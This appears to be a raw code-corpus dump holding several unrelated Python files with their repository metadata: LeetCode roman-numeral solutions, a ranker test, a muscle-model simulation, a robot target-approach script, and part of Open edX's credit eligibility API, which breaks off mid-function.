self.assertNothingPrinted()
| 30.952381 | 118 | 0.558974 |
7954662bac0624b2208f69bb3698d0b379b4f28a | 4,267 | py | Python | leetcode_python/Math/roman-to-integer.py | yennanliu/Python_basics | 6a597442d39468295946cefbfb11d08f61424dc3 | [
"Unlicense"
] | null | null | null | leetcode_python/Math/roman-to-integer.py | yennanliu/Python_basics | 6a597442d39468295946cefbfb11d08f61424dc3 | [
"Unlicense"
] | null | null | null | leetcode_python/Math/roman-to-integer.py | yennanliu/Python_basics | 6a597442d39468295946cefbfb11d08f61424dc3 | [
"Unlicense"
] | null | null | null | """
13. Roman to Integer
Easy
Roman numerals are represented by seven different symbols: I, V, X, L, C, D and M.
Symbol Value
I 1
V 5
X 10
L 50
C 100
D 500
M 1000
For example, 2 is written as II in Roman numeral, just two one's added together. 12 is written as XII, which is simply X + II. The number 27 is written as XXVII, which is XX + V + II.
Roman numerals are usually written largest to smallest from left to right. However, the numeral for four is not IIII. Instead, the number four is written as IV. Because the one is before the five we subtract it making four. The same principle applies to the number nine, which is written as IX. There are six instances where subtraction is used:
I can be placed before V (5) and X (10) to make 4 and 9.
X can be placed before L (50) and C (100) to make 40 and 90.
C can be placed before D (500) and M (1000) to make 400 and 900.
Given a roman numeral, convert it to an integer.
Example 1:
Input: s = "III"
Output: 3
Explanation: III = 3.
Example 2:
Input: s = "LVIII"
Output: 58
Explanation: L = 50, V= 5, III = 3.
Example 3:
Input: s = "MCMXCIV"
Output: 1994
Explanation: M = 1000, CM = 900, XC = 90 and IV = 4.
Constraints:
1 <= s.length <= 15
s contains only the characters ('I', 'V', 'X', 'L', 'C', 'D', 'M').
It is guaranteed that s is a valid roman numeral in the range [1, 3999].
Accepted
1,414,292
Submissions
2,443,425
"""
# V0
class Solution(object):
def romanToInt(self, s):
# helper ref
roman = {"I":1, "V":5, "X":10, "L":50, "C":100, "D":500, "M":1000}
# NOTE : we init res as below
res = roman[s[-1]]
N = len(s)
"""
2 cases:
case 1) XY, X > Y -> res = X - Y
case 2) XY, X < Y -> res = X + Y
"""
for i in range(N - 2, -1, -1):
# case 1
if roman[s[i]] < roman[s[i + 1]]:
res -= roman[s[i]]
# case 2
else:
res += roman[s[i]]
return res
# V1
# https://blog.csdn.net/fuxuemingzhu/article/details/48208995
class Solution(object):
def romanToInt(self, s):
"""
:type s: str
:rtype: int
"""
roman = {"I":1, "V":5, "X":10, "L":50, "C":100, "D":500, "M":1000}
res = roman[s[-1]]
N = len(s)
for i in range(N - 2, -1, -1):
if roman[s[i]] < roman[s[i + 1]]:
res -= roman[s[i]]
else:
res += roman[s[i]]
return res
# V1'
# https://www.jiuzhang.com/solution/roman-to-integer/#tag-highlight-lang-python
class Solution:
# @param {string} s
# @return {integer}
def romanToInt(self, s):
ROMAN = {
'I': 1,
'V': 5,
'X': 10,
'L': 50,
'C': 100,
'D': 500,
'M': 1000
}
if s == "":
return 0
index = len(s) - 2
sum = ROMAN[s[-1]]
while index >= 0:
if ROMAN[s[index]] < ROMAN[s[index + 1]]:
sum -= ROMAN[s[index]]
else:
sum += ROMAN[s[index]]
index -= 1
return sum
# V2
# https://blog.csdn.net/fuxuemingzhu/article/details/48208995
class Solution(object):
def romanToInt(self, s):
"""
:type s: str
:rtype: int
"""
roman = {"I":1, "V":5, "X":10, "L":50, "C":100, "D":500, "M":1000}
res = roman[s[-1]]
N = len(s)
for i in range(N - 2, -1, -1):
if roman[s[i]] < roman[s[i + 1]]:
res -= roman[s[i]]
else:
res += roman[s[i]]
return res
# V3
# Time: O(n)
# Space: O(1)
class Solution(object):
# @return an integer
def romanToInt(self, s):
numeral_map = {"I": 1, "V": 5, "X": 10, "L": 50, "C":100, "D": 500, "M": 1000}
decimal = 0
for i in range(len(s)):
if i > 0 and numeral_map[s[i]] > numeral_map[s[i - 1]]:
decimal += numeral_map[s[i]] - 2 * numeral_map[s[i - 1]]
else:
decimal += numeral_map[s[i]]
return decimal
| 27.352564 | 345 | 0.494727 |
79546738b7fe4f0e154bb33a04dceae5f50a7c1b | 1,816 | py | Python | rankers/MinRanker/tests/test_minranker.py | carlosb1/jina-hub | f298d0f136c8627dd720d7a4e3eb9031655f5ccb | [
"Apache-2.0"
] | 1 | 2022-03-01T12:43:17.000Z | 2022-03-01T12:43:17.000Z | rankers/MinRanker/tests/test_minranker.py | carlosb1/jina-hub | f298d0f136c8627dd720d7a4e3eb9031655f5ccb | [
"Apache-2.0"
] | null | null | null | rankers/MinRanker/tests/test_minranker.py | carlosb1/jina-hub | f298d0f136c8627dd720d7a4e3eb9031655f5ccb | [
"Apache-2.0"
] | null | null | null | import numpy as np
from jina.executors.rankers import Chunk2DocRanker
from .. import MinRanker
def create_data():
query_chunk2match_chunk = {
100: [
{'parent_id': 1, 'id': 10, 'score': 0.4, 'length': 200},
],
110: [
{'parent_id': 1, 'id': 10, 'score': 0.3, 'length': 200},
{'parent_id': 1, 'id': 11, 'score': 0.2, 'length': 200},
{'parent_id': 4294967294, 'id': 20, 'score': 0.1, 'length': 300},
]
}
query_chunk_meta = {}
match_chunk_meta = {}
match_idx = []
num_query_chunks = len(query_chunk2match_chunk)
for query_chunk_id, matches in query_chunk2match_chunk.items():
query_chunk_meta[query_chunk_id] = {'length': num_query_chunks}
for c in matches:
match_chunk_meta[c['id']] = {'length': c['length']}
match_idx.append((
c['parent_id'],
c['id'],
query_chunk_id,
c['score'],
))
match_idx_numpy = np.array(
match_idx,
dtype=[
(Chunk2DocRanker.COL_MATCH_PARENT_ID, np.int64),
(Chunk2DocRanker.COL_MATCH_ID, np.int64),
(Chunk2DocRanker.COL_DOC_CHUNK_ID, np.int64),
(Chunk2DocRanker.COL_SCORE, np.float64)
]
)
return match_idx_numpy, query_chunk_meta, match_chunk_meta
def test_minranker():
ranker = MinRanker()
match_idx, query_chunk_meta, match_chunk_meta = create_data()
doc_idx = ranker.score(match_idx, query_chunk_meta, match_chunk_meta)
# check the matched docs are in descending order of the scores
assert doc_idx[0][1] > doc_idx[1][1]
assert doc_idx[0][0] == 4294967294
assert doc_idx[1][0] == 1
# check the number of matched docs
assert len(doc_idx) == 2
| 31.310345 | 77 | 0.589207 |
7954676a7f4080046cb014f598c4d4d80268316f | 5,468 | py | Python | DartMuscle/muscle.py | hpgit/HumanFoot | f9a1a341b7c43747bddcd5584b8c98a0d1ac2973 | [
"Apache-2.0"
] | null | null | null | DartMuscle/muscle.py | hpgit/HumanFoot | f9a1a341b7c43747bddcd5584b8c98a0d1ac2973 | [
"Apache-2.0"
] | null | null | null | DartMuscle/muscle.py | hpgit/HumanFoot | f9a1a341b7c43747bddcd5584b8c98a0d1ac2973 | [
"Apache-2.0"
] | null | null | null | from math import exp, sin, cos, asin, pi, sqrt
from scipy.optimize import minimize_scalar
# muscle specific parameters
f_m_o, l_m_o, l_t_sl, alpha_opt = 0, 0, 0, 0
# all muslces share these parameters
eps_t_o = 0.033
eps_m_o = 0.6
k_pe = 4.0
gamma = 0.5
dot_l_m_max_tilde = 10.
f_m_len_tilde = 1.8
A_f = 0.3
# Force-Length Relationship of Tendon
f_t_toe_tilde = 0.33
k_toe = 3.0
k_lin = 1.712 / eps_t_o
eps_t_toe = 0.609 * eps_t_o
def g_t_tilde(l_t):
eps_t = l_t / l_t_sl - 1.
if eps_t <= eps_t_toe:
return f_t_toe_tilde * (exp(k_toe * eps_t / eps_t_toe - 1.) - 1.) \
/ \
(exp(k_toe) - 1.)
else:
return k_lin * (eps_t - eps_t_toe) + f_t_toe_tilde
# Passive Force-Length Relationship of Muscle
def g_pl_tilde(l_m):
l_m_tilde = l_m / l_m_o
if l_m_tilde <= 1:
return 0
else:
return (exp(k_pe * (l_m_tilde - 1)/eps_m_o) - 1) \
/ \
(exp(k_pe) - 1)
# Active Force-Length Relationship of Muscle
def g_al_tilde(l_m):
l_m_tilde = l_m / l_m_o
return exp(-(l_m_tilde-1)*(l_m_tilde-1)/gamma)
# Force-Velocity Relationship of Muscle
def g_vl_tilde(dot_l_m):
dot_l_m_tilde = dot_l_m / l_m_o
if dot_l_m_tilde <= 0:
return (dot_l_m_tilde + dot_l_m_max_tilde) \
/ \
(dot_l_m_max_tilde - dot_l_m_tilde/A_f)
else:
_a = dot_l_m_tilde * (2. + 2./A_f)
_b = dot_l_m_max_tilde * (f_m_len_tilde - 1.)
return (f_m_len_tilde * _a + _b) / (_a + _b)
def compute_activation_deriv_scalar(u, a, tau_act, tau_deact):
tau_total = 0.
if u < a:
tau_total = tau_deact / (0.5 + 1.5*a)
else:
tau_total = tau_act * (0.5 + 1.5*a)
dadt = (u-a) / tau_total
return dadt
def compute_cos_pennation_scalar(l_m, l_m_opt, pa_opt):
pa = 0.
if l_m < 0.:
l_m = 0.
if l_m < 1e-6:
pa = asin(1.)
else:
pa = asin( l_m_opt * sin(pa_opt) / l_m )
if pa > pi/4.:
pa = pi/4.
return cos(pa)
def compute_norm_tendon_force_scalar(eps_t, eps_t_o):
f_t_norm = 0.
if eps_t > eps_t_toe:
f_t_norm = k_lin * (eps_t - eps_t_toe) + f_t_toe_tilde
elif eps_t > 0.:
f_t_norm = (f_t_toe_tilde / (exp(k_toe)-1.)) * (exp(k_toe * eps_t / eps_t_toe) - 1.)
else:
f_t_norm = 0.
return f_t_norm
def compute_norm_passive_fiber_force_by_length_scalar(l_m_norm, eps_m_o, k_pe):
f_p_norm = 0.
if l_m_norm > 1.:
f_p_norm = (exp(k_pe * (l_m_norm - 1.) / eps_m_o) - 1.) / (exp(k_pe) - 1.)
else:
f_p_norm = 0
return f_p_norm
def compute_norm_active_fiber_force_by_length_scalar(l_m_norm, gamma):
return exp(-(l_m_norm-1.)*(l_m_norm-1.) / gamma)
def compute_norm_active_fiber_force_by_velocity_scalar(dl_mdt_norm, a_f, f_m_len, v_m_max):
gv_norm = 0.
if dl_mdt_norm <= 0.:
gv_norm = (dl_mdt_norm + v_m_max) / (v_m_max - dl_mdt_norm/a_f)
else:
lm_term = dl_mdt_norm*(2.+2./a_f)
lmax_term = v_m_max*(f_m_len-1.)
gv_norm = (f_m_len*lm_term + lmax_term) / (lm_term + lmax_term)
return gv_norm
def compute_norm_fiber_length_deriv_scalar(f_m_norm, a, f_l, a_f, f_m_len, damping, v_m_max, option=None):
a_f_l = a * f_l
if damping > 0.:
d = damping
k = 1.
if f_m_norm <= a_f_l:
_a = d/a_f
_b = -(a_f_l + f_m_norm/a_f + k*d)
_c = k*(f_m_norm - a_f_l)
else:
_a = -(2.+2./a_f) * d / f_m_len
_b = -((2.+2./a_f) * (a_f_l*f_m_len - f_m_norm)/(f_m_len-1.) + k*d)
_c = k*(f_m_norm - a_f_l)
det = _b*_b - 4*_a*_c
dl_mdt_unit = (-_b-sqrt(det))/(2.*_a)
else:
if f_m_norm <= a_f_l:
_b = a_f_l + (f_m_norm / a_f)
else:
_b = ( (2. + 2. /a_f) * (a_f_l * f_m_len - f_m_norm ) ) / (f_m_len - 1.)
if _b > 0.:
dl_mdt_unit = (f_m_norm - a_f_l) / _b
else:
dl_mdt_unit = 0.
return v_m_max * dl_mdt_unit
def get_fiber_length_deriv_scalar(a, l_m, l_mt, l_m_opt, pa_opt, l_t_sl, eps_t_o, eps_m_o,
k_pe, gamma, a_f, f_m_len, damping, v_m_max, option=None):
cos_pa = compute_cos_pennation_scalar(l_m, l_m_opt, pa_opt)
l_t = l_mt - l_m * cos_pa
eps_t = (l_t - l_t_sl) / l_t_sl
f_t_norm = compute_norm_tendon_force_scalar(eps_t, eps_t_o)
l_m_norm = l_m / l_m_opt
f_p_norm = compute_norm_passive_fiber_force_by_length_scalar(l_m_norm, eps_m_o, k_pe)
f_l = compute_norm_active_fiber_force_by_length_scalar(l_m_norm, gamma)
f_m_norm = f_t_norm / cos_pa - f_p_norm
dl_mdt_norm = compute_norm_fiber_length_deriv_scalar(f_m_norm, a, f_l, a_f, f_m_len, damping, v_m_max, option)
dl_mdt = l_m_opt * dl_mdt_norm
return dl_mdt
def get_isometric_fiber_length(a, l_m, l_mt, l_m_opt, pa_opt, l_t_sl, eps_t_o, eps_m_o,
k_pe, gamma, a_f, f_m_len, damping, v_m_max, option=None):
def obj_dl_m(_l_m):
dl_mdt = get_fiber_length_deriv_scalar(a, _l_m, l_mt, l_m_opt, pa_opt, l_t_sl, eps_t_o, eps_m_o,
k_pe, gamma, a_f, f_m_len, damping, v_m_max, 'modified_damping')
return dl_mdt * dl_mdt
ub = max(0., l_mt - l_t_sl)
result = minimize_scalar(obj_dl_m, bounds=(0., ub), method='bounded')
return result.x
class Muscle(object):
def __init__(self):
pass | 28.778947 | 114 | 0.604426 |
795468c51f7208813c6000e19243e56b0e75dc2b | 8,159 | py | Python | targetApproach.py | BenjiLee0002/TheUglyDuckling | 13a4bf3307ac5959a7ceb32122a53b91bec2b7f3 | [
"MIT"
] | 4 | 2019-09-25T17:44:07.000Z | 2021-11-03T15:34:19.000Z | targetApproach.py | RishavRajendra/TheUglyDuckling | 1726dd1d4b5c35e4e2b421a8652133724100fffd | [
"MIT"
] | null | null | null | targetApproach.py | RishavRajendra/TheUglyDuckling | 1726dd1d4b5c35e4e2b421a8652133724100fffd | [
"MIT"
] | 1 | 2019-11-22T14:53:17.000Z | 2019-11-22T14:53:17.000Z | from get_stats_from_image import corrected_angle, get_closest_target
from constants import fwd, rev
import time, math
# DONE: Check if the block is actually picked up
def check_pick_up(movement, pic_q):
success = False
movement.cam_down()
time.sleep(3)
target_id, angle, inches, midpoint = get_closest_target(pic_q, True)
if target_id is not 0 and inches < 5:
success = True
movement.cam_up()
return [success, target_id]
def move_to_target(movement, angle, distance):
#movement.turn(angle)
movement.move(fwd, distance)
def move_back_from_target(movement, angle, distance):
movement.move(rev, distance)
#movement.turn(-1*angle)
"""
DONE: Refine pick_up. Take care of edge cases.
Change log
-[0.0.1] Benji
--- Changed sleep from 2 to 1.5; lowest fps is .75 so sleeping
--- for 1.5 seconds is the minimum delay that guarantees fresh video data
-[0.0.2] Rishav
--- Remove recursion. Not getting satisfying results.
"""
def pick_up(movement, pic_q):
movement.cam_down()
# Let the imaging catch_up
time.sleep(3)
# Get data from the closest object
target_id, angle, inches, midpoint = get_closest_target(pic_q, True)
if target_id is not 0:
if midpoint[0] > 125 and midpoint[0] < 230 and midpoint[1] > 255:
movement.pickup()
else:
print("HERE")
correctedAngle = corrected_angle(angle, inches, False)
movement.turn(-correctedAngle)
# Get another picture as distance can get wacky at an angle
target_id, angle, inches, midpoint = get_closest_target(pic_q, True)
# Calculate adjusted angle from the front of the robot instead of the middle of the robot
adjustedDistance = math.ceil(inches*0.75)
adjustedAngle = corrected_angle(angle, inches, False)
# Angles reversed because East is 0 and we increase as we go around
move_to_target(movement,-1*adjustedAngle, adjustedDistance)
movement.pickup()
move_back_from_target(movement,adjustedAngle, adjustedDistance)
# Reverse movements
movement.turn(correctedAngle)
movement.cam_up()
# Moves the robot close to the target
def approach_helper(angle, distance, pic_q, movement):
movement.cam_up()
movement.reset_servo()
adjustedAngle = corrected_angle(angle, distance)
# move towards the target
# Angles reversed because East is 0 and we increase as we go around
move_to_target(movement,-1*adjustedAngle, distance)
#Realign with block
pick_up(movement, pic_q)
# Reverse movement from the target
move_back_from_target(movement, adjustedAngle, distance)
# DONE: Refine approach. Take care of edge cases.
# EDGE CASE 1: obstacle is in way of target
# Potential solution: go to another connected tile
# DONE CASE 2: target not detected after two additional scans.
# DONE CASE 3: second object detected in background
# EDGE CASE 4: target at a very bad angle
"""
Change log
-[0.0.1] Benji
--- Changed sleep from 2 to 1.5; lowest fps is .75 so sleeping
--- for 1.5 seconds is the minimum delay that guarantees fresh video data
-[0.0.2] Rishav
--- Remove recursion as results not satisfying.
"""
def approach(movement, pic_q):
blockFound = False
movement.cam_up()
# Let camera catch up
time.sleep(2)
# Get data of the closest object
target_id, angle, inches = get_closest_target(pic_q)
adjustedDistance = math.ceil(inches*0.9)
adjustedAngle = corrected_angle(angle, inches)
if target_id == 0 or inches > 13 or adjustedAngle > 20:
# If nothing found in approach, check right and left 20 degrees.
movement_list = [-20, 20]
for action in movement_list:
movement.turn(action)
# Let camera catch up
time.sleep(2)
target_id, angle, inches = get_closest_target(pic_q)
if target_id is not 0 and inches < 14:
approach_helper(angle, inches, pic_q, movement)
movement.turn(-1*action)
blockFound = True
break
movement.turn(-1*action)
if blockFound is False:
movement.cam_down()
time.sleep(2)
target_id, angle, inches = get_closest_target(pic_q)
if target_id == 0 or inches > 13:
movement_list = [-20, 20]
for action in movement_list:
movement.turn(action)
# Let camera catch up
time.sleep(2)
target_id, angle, inches = get_closest_target(pic_q)
if target_id is not 0 and inches < 14:
movement.move(rev, 4)
approach_helper(angle, inches, pic_q, movement)
movement.move(fwd, 4)
movement.turn(-1*action)
blockFound = True
movement.cam_up()
break
movement.turn(-1*action)
movement.cam_up()
else:
movement.move(rev, 4)
approach_helper(angle, inches, pic_q, movement)
movement.move(fwd, 4)
movement.cam_up()
else:
# call helper function which moves the robot
approach_helper(angle, inches, pic_q, movement)
# DONE: Refine approach. Take care of edge cases.
# EDGE CASE 1: obstacle is in way of target
# Potential solution: go to another connected tile
# DONE CASE 2: target not detected after two additional scans.
# DONE CASE 3: second object detected in background
# EDGE CASE 4: target at a very bad angle
"""
Change log
-[0.0.1] Benji
--- Changed sleep from 2 to 1.5; lowest fps is .75 so sleeping
--- for 1.5 seconds is the minimum delay that guarantees fresh video data
-[0.0.2] Rishav
--- Remove recursion as results not satisfying.
"""
def approach_obstacle(movement, pic_q):
blockFound = False
movement.cam_up()
# Let camera catch up
time.sleep(2)
# Get data of the closest object
target_id, angle, inches = get_closest_obstacle(pic_q)
adjustedDistance = math.ceil(inches*0.9)
adjustedAngle = corrected_angle(angle, inches)
if target_id == 0 or inches > 13 or adjustedAngle > 20:
# If nothing found in approach, check right and left 20 degrees.
movement_list = [-20, 20]
for action in movement_list:
movement.turn(action)
# Let camera catch up
time.sleep(2)
target_id, angle, inches = get_closest_obstacle(pic_q)
if target_id is not 0 and inches < 14:
approach_obstacle_helper(angle, inches, pic_q, movement)
movement.turn(-1*action)
blockFound = True
break
movement.turn(-1*action)
if blockFound is False:
movement.cam_down()
time.sleep(2)
target_id, angle, inches = get_closest_obstacle(pic_q)
if target_id == 0 or inches > 13:
movement_list = [-20, 20]
for action in movement_list:
movement.turn(action)
# Let camera catch up
time.sleep(2)
target_id, angle, inches = get_closest_obstacle(pic_q)
if target_id is not 0 and inches < 14:
approach_obstacle_helper(angle, inches, pic_q, movement)
movement.turn(-1*action)
blockFound = True
movement.cam_up()
break
movement.turn(-1*action)
movement.cam_up()
else:
approach_obstacle_helper(angle, inches, pic_q, movement)
movement.cam_up()
else:
# call helper function which moves the robot
approach_obstacle_helper(angle, inches, pic_q, movement)
| 39.225962 | 101 | 0.606937 |
795469960aecdbbb44cae22674d64b053bd39746 | 85 | py | Python | threatbutt/__init__.py | ivanlei/threatbutt | faff507a4bebfa585d3044427111418c257c34ec | [
"Apache-2.0"
] | 55 | 2015-04-25T07:22:18.000Z | 2021-05-23T15:04:52.000Z | threatbutt/__init__.py | ivanlei/threatbutt | faff507a4bebfa585d3044427111418c257c34ec | [
"Apache-2.0"
] | null | null | null | threatbutt/__init__.py | ivanlei/threatbutt | faff507a4bebfa585d3044427111418c257c34ec | [
"Apache-2.0"
] | 8 | 2015-04-27T03:51:49.000Z | 2021-04-28T22:17:18.000Z | # -*- coding: utf-8 -*-
from .threatbutt import ThreatButt
__all__ = ['ThreatButt']
| 17 | 34 | 0.670588 |
79546aa0b4fdb7803f31d7386c0d88c52ff6efe1 | 16,191 | py | Python | Part-03-Understanding-Software-Crafting-Your-Own-Tools/models/edx-platform/openedx/core/djangoapps/credit/api/eligibility.py | osoco/better-ways-of-thinking-about-software | 83e70d23c873509e22362a09a10d3510e10f6992 | [
"MIT"
] | 3 | 2021-12-15T04:58:18.000Z | 2022-02-06T12:15:37.000Z | Part-03-Understanding-Software-Crafting-Your-Own-Tools/models/edx-platform/openedx/core/djangoapps/credit/api/eligibility.py | osoco/better-ways-of-thinking-about-software | 83e70d23c873509e22362a09a10d3510e10f6992 | [
"MIT"
] | null | null | null | Part-03-Understanding-Software-Crafting-Your-Own-Tools/models/edx-platform/openedx/core/djangoapps/credit/api/eligibility.py | osoco/better-ways-of-thinking-about-software | 83e70d23c873509e22362a09a10d3510e10f6992 | [
"MIT"
] | 1 | 2019-01-02T14:38:50.000Z | 2019-01-02T14:38:50.000Z | """
APIs for configuring credit eligibility requirements and tracking
whether a user has satisfied those requirements.
"""
import logging
from opaque_keys.edx.keys import CourseKey
from common.djangoapps.course_modes.models import CourseMode
from openedx.core.djangoapps.credit.email_utils import send_credit_notifications
from openedx.core.djangoapps.credit.exceptions import InvalidCreditCourse, InvalidCreditRequirements
from openedx.core.djangoapps.credit.models import (
CreditCourse,
CreditEligibility,
CreditRequest,
CreditRequirement,
CreditRequirementStatus
)
from common.djangoapps.student.models import CourseEnrollment
# TODO: Cleanup this mess! ECOM-2908
log = logging.getLogger(__name__)
def is_credit_course(course_key):
"""
Check whether the course has been configured for credit.
Args:
course_key (CourseKey): Identifier of the course.
Returns:
bool: True iff this is a credit course.
"""
return CreditCourse.is_credit_course(course_key=course_key)
def set_credit_requirements(course_key, requirements):
"""
Add requirements to given course.
Args:
course_key(CourseKey): The identifier for course
requirements(list): List of requirements to be added
Example:
>>> set_credit_requirements(
"course-v1-edX-DemoX-1T2015",
[
{
"namespace": "proctored_exam",
"name": "i4x://edX/DemoX/proctoring-block/final_uuid",
"display_name": "Final Exam",
"criteria": {},
},
{
"namespace": "grade",
"name": "grade",
"display_name": "Grade",
"criteria": {"min_grade": 0.8},
},
])
Raises:
InvalidCreditRequirements
Returns:
None
"""
invalid_requirements = _validate_requirements(requirements)
if invalid_requirements:
invalid_requirements = ", ".join(invalid_requirements)
raise InvalidCreditRequirements(invalid_requirements)
try:
credit_course = CreditCourse.get_credit_course(course_key=course_key)
except CreditCourse.DoesNotExist:
raise InvalidCreditCourse() # lint-amnesty, pylint: disable=raise-missing-from
old_requirements = CreditRequirement.get_course_requirements(course_key=course_key)
requirements_to_disable = _get_requirements_to_disable(old_requirements, requirements)
if requirements_to_disable:
CreditRequirement.disable_credit_requirements(requirements_to_disable)
for sort_value, requirement in enumerate(requirements):
CreditRequirement.add_or_update_course_requirement(credit_course, requirement, sort_value)
def get_credit_requirements(course_key, namespace=None):
"""
Get credit eligibility requirements of a given course and namespace.
Args:
course_key(CourseKey): The identifier for course
namespace(str): Namespace of requirements
Example:
>>> get_credit_requirements("course-v1-edX-DemoX-1T2015")
{
requirements =
[
{
"namespace": "proctored_exam",
"name": "i4x://edX/DemoX/proctoring-block/final_uuid",
"display_name": "Final Exam",
"criteria": {},
},
{
"namespace": "grade",
"name": "grade",
"display_name": "Grade",
"criteria": {"min_grade": 0.8},
},
]
}
Returns:
Dict of requirements in the given namespace
"""
requirements = CreditRequirement.get_course_requirements(course_key, namespace)
return [
{
"namespace": requirement.namespace,
"name": requirement.name,
"display_name": requirement.display_name,
"criteria": requirement.criteria
}
for requirement in requirements
]
def is_user_eligible_for_credit(username, course_key):
"""
Returns a boolean indicating if the user is eligible for credit for
the given course
Args:
username(str): The identifier for user
course_key (CourseKey): The identifier for course
Returns:
True if user is eligible for the course else False
"""
return CreditEligibility.is_user_eligible_for_credit(course_key, username)
def get_eligibilities_for_user(username, course_key=None):
"""
Retrieve all courses or particular course for which the user is eligible
for credit.
Arguments:
username (unicode): Identifier of the user.
course_key (unicode): Identifier of the course.
Example:
>>> get_eligibilities_for_user("ron")
[
{
"course_key": "edX/Demo_101/Fall",
"deadline": "2015-10-23"
},
{
"course_key": "edX/Demo_201/Spring",
"deadline": "2015-11-15"
},
...
]
Returns: list
"""
eligibilities = CreditEligibility.get_user_eligibilities(username)
if course_key:
course_key = CourseKey.from_string(str(course_key))
eligibilities = eligibilities.filter(course__course_key=course_key)
return [
{
"course_key": str(eligibility.course.course_key),
"deadline": eligibility.deadline,
}
for eligibility in eligibilities
]
def set_credit_requirement_status(user, course_key, req_namespace, req_name, status="satisfied", reason=None):
"""
Update the user's requirement status.
This will record whether the user satisfied or failed a particular requirement
in a course. If the user has satisfied all requirements, the user will be marked
as eligible for credit in the course.
Args:
user(User): User object to set credit requirement for.
course_key (CourseKey): Identifier for the course associated with the requirement.
req_namespace (str): Namespace of the requirement (e.g. "grade" or "reverification")
req_name (str): Name of the requirement (e.g. "grade" or the location of the ICRV XBlock)
Keyword Arguments:
status (str): Status of the requirement (either "satisfied" or "failed")
reason (dict): Reason of the status
"""
# Check whether user has credit eligible enrollment.
enrollment_mode, is_active = CourseEnrollment.enrollment_mode_for_user(user, course_key)
has_credit_eligible_enrollment = (CourseMode.is_credit_eligible_slug(enrollment_mode) and is_active)
# Refuse to set status of requirement if the user enrollment is not credit eligible.
if not has_credit_eligible_enrollment:
return
# Do not allow students who have requested credit to change their eligibility
if CreditRequest.get_user_request_status(user.username, course_key):
log.info(
'Refusing to set status of requirement with namespace "%s" and name "%s" because the '
'user "%s" has already requested credit for the course "%s".',
req_namespace, req_name, user.username, course_key
)
return
# Do not allow a student who has earned eligibility to un-earn eligibility
eligible_before_update = CreditEligibility.is_user_eligible_for_credit(course_key, user.username)
if eligible_before_update and status == 'failed':
log.info(
'Refusing to set status of requirement with namespace "%s" and name "%s" to "failed" because the '
'user "%s" is already eligible for credit in the course "%s".',
req_namespace, req_name, user.username, course_key
)
return
# Retrieve all credit requirements for the course
# We retrieve all of them to avoid making a second query later when
# we need to check whether all requirements have been satisfied.
reqs = CreditRequirement.get_course_requirements(course_key)
# Find the requirement we're trying to set
req_to_update = next((
req for req in reqs
if req.namespace == req_namespace and req.name == req_name
), None)
# If we can't find the requirement, then the most likely explanation
# is that there was a lag updating the credit requirements after the course
# was published. We *could* attempt to create the requirement here,
# but that could cause serious performance issues if many users attempt to
# lock the row at the same time.
# Instead, we skip updating the requirement and log an error.
if req_to_update is None:
log.error(
(
'Could not update credit requirement in course "%s" '
'with namespace "%s" and name "%s" '
'because the requirement does not exist. '
'The user "%s" should have had their status updated to "%s".'
),
str(course_key), req_namespace, req_name, user.username, status
)
return
# Update the requirement status
CreditRequirementStatus.add_or_update_requirement_status(
user.username, req_to_update, status=status, reason=reason
)
# If we're marking this requirement as "satisfied", there's a chance that the user has met all eligibility
# requirements, and should be notified. However, if the user was already eligible, do not send another notification.
if status == "satisfied" and not eligible_before_update:
is_eligible, eligibility_record_created = CreditEligibility.update_eligibility(reqs, user.username, course_key)
if eligibility_record_created and is_eligible:
try:
send_credit_notifications(user.username, course_key)
except Exception: # pylint: disable=broad-except
log.exception("Error sending email")
def remove_credit_requirement_status(username, course_key, req_namespace, req_name):
"""
Remove the user's requirement status.
This will remove the record from the credit requirement status table.
The user will still be eligible for the credit in a course.
Args:
username (str): Username of the user
course_key (CourseKey): Identifier for the course associated
with the requirement.
req_namespace (str): Namespace of the requirement
(e.g. "grade" or "reverification")
req_name (str): Name of the requirement
(e.g. "grade" or the location of the ICRV XBlock)
"""
# Find the requirement we're trying to remove
req_to_remove = CreditRequirement.get_course_requirement(course_key, req_namespace, req_name)
# If we can't find the requirement, then the most likely explanation
# is that there was a lag removing the credit requirements after the course
# was published. We *could* attempt to remove the requirement here,
# but that could cause serious performance issues if many users attempt to
# lock the row at the same time.
# Instead, we skip removing the requirement and log an error.
if not req_to_remove:
log.error(
(
'Could not remove credit requirement in course "%s" '
'with namespace "%s" and name "%s" '
'because the requirement does not exist. '
),
str(course_key), req_namespace, req_name
)
return
# Remove the requirement status
CreditRequirementStatus.remove_requirement_status(
username, req_to_remove
)
def get_credit_requirement_status(course_key, username, namespace=None, name=None):
""" Retrieve the user's status for each credit requirement in the course.
Args:
course_key (CourseKey): The identifier for course
username (str): The identifier of the user
Example:
>>> get_credit_requirement_status("course-v1-edX-DemoX-1T2015", "john")
[
{
"namespace": "proctored_exam",
"name": "i4x://edX/DemoX/proctoring-block/final_uuid",
"display_name": "Proctored Mid Term Exam",
"criteria": {},
"reason": {},
"status": "satisfied",
"status_date": "2015-06-26 11:07:42",
"order": 1,
},
{
"namespace": "grade",
"name": "i4x://edX/DemoX/proctoring-block/final_uuid",
"display_name": "Minimum Passing Grade",
"criteria": {"min_grade": 0.8},
"reason": {"final_grade": 0.95},
"status": "satisfied",
"status_date": "2015-06-26 11:07:44",
"order": 2,
},
]
Returns:
list of requirement statuses
"""
requirements = CreditRequirement.get_course_requirements(course_key, namespace=namespace, name=name)
requirement_statuses = CreditRequirementStatus.get_statuses(requirements, username)
requirement_statuses = {o.requirement: o for o in requirement_statuses}
statuses = []
for requirement in requirements:
requirement_status = requirement_statuses.get(requirement)
statuses.append({
"namespace": requirement.namespace,
"name": requirement.name,
"display_name": requirement.display_name,
"criteria": requirement.criteria,
"reason": requirement_status.reason if requirement_status else None,
"status": requirement_status.status if requirement_status else None,
"status_date": requirement_status.modified if requirement_status else None,
# We retain the old name "order" in the API because changing APIs takes a lot more coordination.
"order": requirement.sort_value,
})
return statuses
def _get_requirements_to_disable(old_requirements, new_requirements):
"""
Get the ids of 'CreditRequirement' entries to be disabled that are
deleted from the courseware.
Args:
old_requirements(QuerySet): QuerySet of CreditRequirement
new_requirements(list): List of requirements being added
Returns:
List of ids of CreditRequirement that are not in new_requirements
"""
requirements_to_disable = []
for old_req in old_requirements:
found_flag = False
for req in new_requirements:
# check if an already added requirement is modified
if req["namespace"] == old_req.namespace and req["name"] == old_req.name:
found_flag = True
break
if not found_flag:
requirements_to_disable.append(old_req.id)
return requirements_to_disable
def _validate_requirements(requirements):
"""
Validate the requirements.
Args:
requirements(list): List of requirements
Returns:
List of strings of invalid requirements
"""
invalid_requirements = []
for requirement in requirements:
invalid_params = []
